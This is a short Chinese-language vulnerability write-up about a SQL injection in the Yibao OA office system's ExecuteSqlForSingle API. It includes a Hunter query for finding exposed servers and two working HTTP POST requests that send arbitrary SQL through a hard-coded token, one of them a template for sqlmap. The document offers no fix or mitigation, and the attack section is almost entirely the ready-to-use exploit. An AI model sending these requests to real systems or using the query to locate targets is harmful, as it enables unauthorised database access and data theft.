易宝OA ExecuteSqlForSingle SQL注入漏洞
一、漏洞简介
易宝OA是一款非常强大的手机办公软件,这里不仅为广大的用户提供了一个更好的工作日历,而且每个人都可以在这里进行重要事项的记录,同时软件中还拥有更好的打卡系统,让用户可以快速记录自己的工作时常,而且调班与补卡也会更加的简单,让你工作活跃度得到提升。易宝OA ExecuteSqlForSingle SQL注入漏洞,可通过该漏洞获取数据库权限。
二、影响版本
- 易宝OA
三、资产测绘
- hunter
web.title="欢迎登录易宝OA系统"||banner="易宝OA" - 特征
四、漏洞复现
POST /api/system/ExecuteSqlForSingle HTTP/1.1
Host: xx.xx.xx.xx
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 103
token=zxh&sql=select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)&strParameters=
sqlmap
POST /api/system/ExecuteSqlForSingle HTTP/1.1
Host: xx.xx.xx.xx
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 103
token=zxh&sql=1&strParameters=